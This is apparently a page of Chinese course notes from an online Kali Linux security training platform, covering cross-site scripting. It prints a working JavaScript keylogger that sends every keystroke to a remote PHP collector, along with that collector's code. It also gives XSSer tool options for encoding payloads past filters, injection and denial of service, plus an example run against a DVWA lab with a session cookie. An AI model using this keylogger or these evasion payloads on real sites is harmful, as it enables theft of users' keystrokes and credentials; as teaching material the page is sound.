Kali Linux安全测试 - 安全牛课堂 - 先进的信息安全在线教育平台

XSS

键盘记录

Keylogger.js

源码

document.onkeypress=function(evt){

evt=evt||window.event

key=String.fromCharCode(evt.charCode)

if(key){

var http = new XMLHttpRequest();

var param = encodeURI(key)

http.open("POST","http://1.1.1.1/keylogger.php",true)

http.setRequestHeader("Content-type","application/x-www-form-urlencoded");

http.send("key="+param);

}

接受信息的页面

<?php $key=$_POST['key'];$logfile="keylog.txt";$fp = fopen($logfile, "a");fwrite($fp, $key);fclose($fp); ?>

利用

html中利用

type

Xsser工具

命令行/图形化工具

--gtk 用图形化启动

绕过服务器端输入筛选

10进制/16进制编码

-u "http://1.1.1.1/dvwa/" 指定url

-g "xss_r/?name-"使用get方式

--cookie="" 带入cookie

-s 统计测试多少次

-v 显示详细内容

--reverse-check 默认提交哈希值，该参数开启时，提交真正的xss利用代码，反向连接代码

--heuristic 启发式测试，检测被过滤的字符

对payload编码，绕过服务器端筛选过滤

--Str Use method String.FromCharCode()

--Une Use Unescape() function

--Mix Mix String.FromCharCode() and Unescape()

--Dec Use Decimal encoding

--Hex Use Hexadecimal encoding

--Hes Use Hexadecimal encoding, with semicolons

--Dwo Encode vectors IP addresses in DWORD

--Doo Encode vectors IP addresses in Octal

--Cem=CEM Try -manually- different Character Encoding Mutations

(reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')

注入技术

--Coo Cross Site Scripting Cookie injection

--Xsa Cross Site Agent Scripting

--Xsr Cross Site Referer Scripting --Dcp Data Control Protocol injections

--Dom Document Object Model injections

--Ind HTTP Response Splitting Induced code

--Anchor Use Anchor Stealth payloader (DOM shadows!)

--Phpids PHP - Exploit PHPIDS bug (0.6.5) to bypass filters
--B64 Base64 code encoding in META tag (rfc2397)
--Onm ONM - Use onMouseMove() event to inject code
--Ifr Use <iframe> source tag to inject code

拒绝服务攻击

--Doss XSS Denial of service (server) injection
--Dos XSS Denial of service (client) injection

例子

xsser -u"http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=high; PHPSESSID=d23e469411707ff8210717e67c521a81" -- Cem='Mix,Une,Str,Hex'

授课教师

课程特色

最新学员

学员动态